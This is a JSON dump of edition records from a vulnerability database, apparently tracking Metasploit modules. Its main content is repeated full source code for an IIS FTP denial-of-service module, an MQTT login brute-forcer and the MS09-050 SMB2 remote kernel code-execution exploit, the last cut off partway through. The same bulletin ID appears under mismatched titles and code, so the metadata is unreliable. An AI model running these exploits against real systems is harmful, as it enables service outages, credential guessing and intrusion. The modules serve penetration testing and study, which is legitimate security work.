["CVE-2009-2521"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310900944", "OPENVAS:900944", "OPENVAS:900874", "OPENVAS:1361412562310900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:9587", "EDB-ID:17476"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}], "modified": "2019-06-01T21:52:09"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-01T21:52:09", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 65}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "d8a403b0fc70c32cbed7d4276efa9783", "type": "metasploit", "bulletinFamily": "exploit", "title": "MQTT Authentication Scanner", "description": "This module attempts to authenticate to MQTT.\n", "published": "2017-12-20T20:29:50", "modified": "2017-12-21T02:44:43", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://docs.oasis-open.org/mqtt/mqtt/v3.1.1/os/mqtt-v3.1.1-os.html#_Table_3.1_-"], "cvelist": [], "lastseen": "2019-06-14T06:46:53", "history": [], "viewCount": 116, "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2019-06-14T06:46:53"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:5327567625025429751", "KITPLOIT:848557943432643852"]}, {"type": "threatpost", "idList": ["THREATPOST:6303DBC0403A6D1E0001CA4D0BB457D7", "THREATPOST:728B7B7DADCC6A87A1FC1388B993CC16", "THREATPOST:3C0E73E1C38071923188099A40931C49", "THREATPOST:997BDAF6F56D4542DDD5DDA9729D190F"]}, {"type": "hackread", "idList": ["HACKREAD:01125680DADB5F8B4BD421CB3E4C226B"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:542F2316CEDEF062C9F4E42DB46172A1"]}, {"type": "ics", "idList": ["ICSA-19-164-01"]}, {"type": "exploitdb", "idList": ["EDB-ID:46987", "EDB-ID:46988"]}, {"type": "thn", "idList": ["THN:AF2759606567B1C62B76706F16A896F2"]}, {"type": "krebs", "idList": ["KREBS:72AD883B9D56B1738723ABBD656A0AED"]}, {"type": "securelist", "idList": ["SECURELIST:DF2707C91EBB08659B3D16664DEEC69A"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310814980", "OPENVAS:1361412562310815086", "OPENVAS:1361412562310815206", "OPENVAS:1361412562310815208", "OPENVAS:1361412562310815205", "OPENVAS:1361412562310814982"]}], "modified": "2019-06-14T06:46:53"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/mqtt/connect.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/credential_collection'\nrequire 'metasploit/framework/login_scanner/mqtt'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::MQTT\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n\n def initialize\n super(\n 'Name' => 'MQTT Authentication Scanner',\n 'Description' => %q(\n This module attempts to authenticate to MQTT.\n ),\n 'Author' =>\n [\n 'Jon Hart <jon_hart[at]rapid7.com>'\n ],\n 'References' =>\n [\n ['URL', 'http://docs.oasis-open.org/mqtt/mqtt/v3.1.1/os/mqtt-v3.1.1-os.html#_Table_3.1_-']\n ],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' =>\n {\n 'BLANK_PASSWORDS' => false,\n 'USER_AS_PASS' => true,\n 'USER_FILE' => 'data/wordlists/unix_users.txt',\n 'PASS_FILE' => 'data/wordlists/unix_passwords.txt'\n }\n )\n end\n\n def test_login(username, password)\n client_opts = {\n username: username,\n password: password,\n read_timeout: read_timeout,\n client_id: client_id\n }\n connect\n client = Rex::Proto::MQTT::Client.new(sock, client_opts)\n connect_res = client.connect\n client.disconnect\n connect_res.return_code.zero?\n end\n\n def default_login\n vprint_status(\"Testing without credentials\")\n if test_login('', '')\n print_good(\"Does not require authentication\")\n end\n\n end\n\n def run_host(_ip)\n unless default_login\n brute\n end\n end\n\n def brute\n vprint_status(\"Starting MQTT login sweep\")\n\n cred_collection = Metasploit::Framework::CredentialCollection.new(\n blank_passwords: datastore['BLANK_PASSWORDS'],\n pass_file: datastore['PASS_FILE'],\n password: datastore['PASSWORD'],\n user_file: datastore['USER_FILE'],\n userpass_file: datastore['USERPASS_FILE'],\n username: datastore['USERNAME'],\n user_as_pass: datastore['USER_AS_PASS']\n )\n\n cred_collection = prepend_db_passwords(cred_collection)\n\n scanner = Metasploit::Framework::LoginScanner::MQTT.new(\n host: rhost,\n port: rport,\n read_timeout: datastore['READ_TIMEOUT'],\n client_id: client_id,\n proxies: datastore['PROXIES'],\n cred_details: cred_collection,\n stop_on_success: datastore['STOP_ON_SUCCESS'],\n bruteforce_speed: datastore['BRUTEFORCE_SPEED'],\n connection_timeout: datastore['ConnectTimeout'],\n max_send_size: datastore['TCP::max_send_size'],\n send_delay: datastore['TCP::send_delay'],\n framework: framework,\n framework_module: self,\n ssl: datastore['SSL'],\n ssl_version: datastore['SSLVersion'],\n ssl_verify_mode: datastore['SSLVerifyMode'],\n ssl_cipher: datastore['SSLCipher'],\n local_port: datastore['CPORT'],\n local_host: datastore['CHOST']\n )\n\n scanner.scan! do |result|\n credential_data = result.to_h\n credential_data.merge!(\n module_fullname: fullname,\n workspace_id: myworkspace_id\n )\n password = result.credential.private\n username = result.credential.public\n if result.success?\n credential_core = create_credential(credential_data)\n credential_data[:core] = credential_core\n create_credential_login(credential_data)\n print_good(\"MQTT Login Successful: #{username}/#{password}\")\n else\n invalidate_login(credential_data)\n vprint_error(\"MQTT LOGIN FAILED: #{username}/#{password} (#{result.proof})\")\n end\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-14T06:46:53", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 66}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "1701ea7952a28f6b5c71b539ce24ebf2", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-06-14T14:36:12", "history": [], "viewCount": 117, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-06-14T14:36:12"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "exploitdb", "idList": ["EDB-ID:9587", "EDB-ID:17476"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900944", "OPENVAS:900874", "OPENVAS:1361412562310900874"]}, {"type": "seebug", "idList": ["SSV:12477", "SSV:12236"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}], "modified": "2019-06-14T14:36:12"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-14T14:36:12", "differentElements": ["cvelist", "cvss", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 67}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "2ebe361c7cde9c24289f12812ad4fabf", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference", "description": "This module exploits an out of bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw.\n", "published": "2010-02-26T13:42:17", "modified": "2019-05-23T12:01:21", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103", "https://seclists.org/fulldisclosure/2009/Sep/0039.html"], "cvelist": ["CVE-2009-3103"], "lastseen": "2019-06-18T07:01:17", "history": [], "viewCount": 117, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-06-14T14:36:12"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "exploitdb", "idList": ["EDB-ID:9587", "EDB-ID:17476"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900944", "OPENVAS:900874", "OPENVAS:1361412562310900874"]}, {"type": "seebug", "idList": ["SSV:12477", "SSV:12236"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}], "modified": "2019-06-14T14:36:12"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Exploit::KernelMode\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference',\n 'Description' => %q{\n This module exploits an out of bounds function table dereference in the SMB\n request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7\n release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista\n without SP1 does not seem affected by this flaw.\n },\n\n 'Author' => [ 'Laurent Gaffie <laurent.gaffie[at]gmail.com>', 'hdm', 'sf' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'MSB', 'MS09-050' ],\n [ 'CVE', '2009-3103' ],\n [ 'BID', '36299' ],\n [ 'OSVDB', '57799' ],\n [ 'URL', 'https://seclists.org/fulldisclosure/2009/Sep/0039.html' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 1024,\n 'StackAdjustment' => -3500,\n 'DisableNops' => true,\n 'EncoderType' => Msf::Encoder::Type::Raw,\n 'ExtendedOptions' =>\n {\n 'Stager' => 'stager_sysenter_hook',\n }\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows Vista SP1/SP2 and Server 2008 (x86)',\n {\n 'Platform' => 'win',\n 'Arch' => [ ARCH_X86 ],\n 'Ret' => 0xFFD00D09, # \"POP ESI; RET\" from the kernels HAL memory region ...no ASLR :)\n 'ReadAddress' => 0xFFDF0D04, # A readable address from kernel space (no nulls in address).\n 'ProcessIDHigh' => 0x0217, # srv2!SrvSnapShotScavengerTimer\n 'MagicIndex' => 0x3FFFFFB4, # (DWORD)( MagicIndex*4 + 0x130 ) == 0\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Sep 07 2009'\n ))\n\n register_options(\n [\n Opt::RPORT(445),\n OptInt.new( 'WAIT', [ true, \"The number of seconds to wait for the attack to complete.\", 180 ] )\n ])\n end\n\n # Not reliable enough for automation yet\n def autofilter\n false\n end\n\n def exploit\n print_status( \"Connecting to the target (#{datastore['RHOST']}:#{datastore['RPORT']})...\" )\n connect\n\n # we use ReadAddress to avoid problems in srv2!SrvProcCompleteRequest\n # and srv2!SrvProcPartialCompleteCompoundedRequest\n dialects = [ [ target['ReadAddress'] ].pack(\"V\") * 25, \"SMB 2.002\" ]\n\n data = dialects.collect { |dialect| \"\\x02\" + dialect + \"\\x00\" }.join('')\n data += [ 0x00000000 ].pack(\"V\") * 37 # Must be NULL's\n data += [ 0xFFFFFFFF ].pack(\"V\") # Used in srv2!SrvConsumeDataAndComplete2+0x34 (known stability issue with srv2!SrvConsumeDataAndComplete2+6b)\n data += [ 0xFFFFFFFF ].pack(\"V\") # Used in srv2!SrvConsumeDataAndComplete2+0x34\n data += [ 0x42424242 ].pack(\"V\") * 7 # Unused\n data += [ target['MagicIndex'] ].pack(\"V\") # An index to force an increment the SMB header value :) (srv2!SrvConsumeDataAndComplete2+0x7E)\n data += [ 0x41414141 ].pack(\"V\") * 6 # Unused\n data += [ target.ret ].pack(\"V\") # EIP Control thanks to srv2!SrvProcCompleteRequest+0xD2\n data += payload.encoded # Our ring0 -> ring3 shellcode\n\n # We gain code execution by returning into the SMB packet, begining with its header.\n # The SMB packets Magic Header value is 0xFF534D42 which assembles to \"CALL DWORD PTR [EBX+0x4D]; INC EDX\"\n # This will cause an access violation if executed as we can never set EBX to a valid pointer.\n # To overcome this we force an increment of the header value (via MagicIndex), transforming it to 0x00544D42.\n # This assembles to \"ADD BYTE PTR [EBP+ECX*2+0x42], DL\" which is fine as ECX will be zero and EBP is a vaild pointer.\n # We patch the Signature1 value to be a jump forward into our shellcode.\n packet = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct\n packet['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE\n packet['Payload']['SMB'].v['Flags1'] = 0x18\n packet['Payload']['SMB'].v['Flags2'] = 0xC853\n packet['Payload']['SMB'].v['ProcessIDHigh'] = target['ProcessIDHigh']\n packet['Payload']['SMB'].v['Signature1'] = 0x0158E900 # \"JMP DWORD 0x15D\" ; jump into our ring0 payload.\n packet['Payload']['SMB'].v['Signature2'] = 0x00000000 # ...\n packet['Payload']['SMB'].v['MultiplexID'] = rand( 0x10000 )\n packet['Payload'].v['Payload'] = data\n\n packet = packet.to_s\n\n print_status( \"Sending the exploit packet (#{packet.length} bytes)...\" )\n sock.put( packet )\n\n\n wtime = datastore['WAIT'].to_i\n print_status( \"Waiting up to #{wtime} second#{wtime == 1 ? '' : 's'} for exploit to trigger...\" )\n stime = Time.now.to_i\n\n\n poke_logins = %W{Guest Administrator}\n poke_logins.each do |login|\n begin\n sec = connect(false)\n sec.login(datastore['SMBName'], login, rand_text_alpha(rand(8)+1), rand_text_alpha(rand(8)+1))\n rescue ::Exception => e\n sec.socket.close\n end\n end\n\n while( stime + wtime > Time.now.to_i )\n select(nil, nil, nil, 0.25)\n break if session_created?\n end\n\n handler\n disconnect\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-18T07:01:17", "differentElements": ["cvelist", "cvss", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 68}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "1701ea7952a28f6b5c71b539ce24ebf2", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-06-18T08:57:53", "history": [], "viewCount": 117, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-06-14T14:36:12"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "exploitdb", "idList": ["EDB-ID:9587", "EDB-ID:17476"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900944", "OPENVAS:900874", "OPENVAS:1361412562310900874"]}, {"type": "seebug", "idList": ["SSV:12477", "SSV:12236"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}], "modified": "2019-06-14T14:36:12"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-18T08:57:53", "differentElements": ["cvelist", "cvss", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 69}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "2ebe361c7cde9c24289f12812ad4fabf", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference", "description": "This module exploits an out of bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw.\n", "published": "2010-02-26T13:42:17", "modified": "2019-05-23T12:01:21", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103", "https://seclists.org/fulldisclosure/2009/Sep/0039.html"], "cvelist": ["CVE-2009-3103"], "lastseen": "2019-06-18T20:40:44", "history": [], "viewCount": 117, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-06-14T14:36:12"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "exploitdb", "idList": ["EDB-ID:9587", "EDB-ID:17476"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900944", "OPENVAS:900874", "OPENVAS:1361412562310900874"]}, {"type": "seebug", "idList": ["SSV:12477", "SSV:12236"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}], "modified": "2019-06-14T14:36:12"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Exploit::KernelMode\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference',\n 'Description' => %q{\n This module exploits an out of bounds function table dereference in the SMB\n request validation 